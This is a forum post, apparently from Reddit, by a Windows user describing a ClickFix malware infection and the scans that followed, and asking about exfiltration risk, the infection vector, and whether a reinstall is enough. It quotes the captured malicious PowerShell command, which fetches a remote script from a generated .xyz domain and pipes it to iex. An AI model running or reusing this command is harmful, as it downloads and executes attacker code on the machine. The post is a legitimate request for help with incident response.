Looking for some informed takes on how worried I should actually be.
A few hours ago, my PC had been on for about 40 minutes (just gaming, not browsing) when Defender started firing alerts about a clickFix around 18h45.
I immediately started a Defender Offline scan which came back with results, but failed to stop the clickfix alerts, then I launched a full Malwarebytes scan around 19h.
That's when three notable detections came up: a VirTool:Win32/DefenderTamperingRestore flagged as "incomplete repair" targeting HKLM\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware, a Trojan:Win32/ShellCodeRunner.NZL!MTB payload at C:\Users\<me>\AppData\LocalLow\IGDump\X86_03\17774820503.ext, plus the corresponding Trojan:Win32/ClickFix.PJ!MTB and a CoinMiner, all three contained.
Alerts stopped shortly after Malwarebytes took over, though I'm not sure if that's because the threat was actually neutralized or just because Defender went passive once Malwarebytes registered as primary AV.
Multiple subsequent scans (Defender Offline, full Malwarebytes runs, a long ESET online scan) seem to have found and contained the malware and are now coming back clean (malwarebytes which I ran first found a few).
The captured ClickFix command was:
cmd /c powershell.exe irm "$([Math]::Floor([DateTimeOffset]::UtcNow.ToUnixTimeSeconds() / 5000000) * 5000000*2)[.]xyz/script?id=TRMMrwe5Fc&tag=trnt2" | iex
What's confusing me on the vector side: I never manually pasted anything in Win+R or PowerShell, no fake CAPTCHA or fake update prompt, and I wasn't browsing actively at the time. So the execution had to come from somewhere else, maybe a previously downloaded file with delayed trigger, a compromised browser extension running in the background, a scheduled task, something I'm not seeing. (I did a thorough cleanup of my files just in case).
Worth noting: I've seen a couple of other Reddit users report the exact same ClickFix alert at the same timing that day, which makes me think there's some kind of synchronized trigger involved rather than something I might have done at the time it started.
For context on what was potentially exposed, Firefox is my main browser with sessions/cookies/history wiped about
2 weeks before the incident, Bitwarden was locked during the incident with auto-lock enabled, 2FA is set up everywhere by default. Only browser-stored data was payment cards autofill (Firefox doesn't store CVV).
Since the incident I've logged out everywhere, changed critical passwords and audited my account activity.
Planning a full wipe if need be.
How realistic is silent exfiltration given the payload landed on disk before quarantine, but with Bitwarden locked and 2FA everywhere?
Any idea what kind of vector could trigger this without active browsing or manual paste?
On the DefenderTamperingRestore "incomplete repair", my understanding is the targeted DisableAntiSpyware key is effectively neutralized by Tamper Protection on modern Win10/11 regardless of value. Is that right, or does "incomplete" mean something more concerning here?
Is a secure erase + clean Win install enough, or does the privilege escalation attempt warrant a UEFI reflash too?
Thanks in advance for any help
And sorry too, that's a lot of information and questions, but I am losing some sleep over this 🥲